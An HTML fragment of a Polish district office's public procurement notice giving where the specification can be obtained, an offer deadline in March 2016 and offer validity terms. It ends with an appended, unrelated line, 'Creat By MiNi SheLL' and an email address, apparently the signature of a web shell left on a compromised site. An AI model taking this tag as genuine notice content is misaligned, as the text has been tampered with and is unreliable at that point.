<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nowodworski.pl  - zakładka: Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nowym Dworze Mazowieckim
ul. Ignacego Paderewskiego 1B
05-100 NOWY DWÓR MAZOWIECKI,  pokój 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2016 godzina 11:30, miejsce: Starostwo Powiatowe w Nowym Dworze Mazowieckim
ul. Ignacego Paderewskiego 1B
05-100 NOWY DWÓR MAZOWIECKI,  pokój 106 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com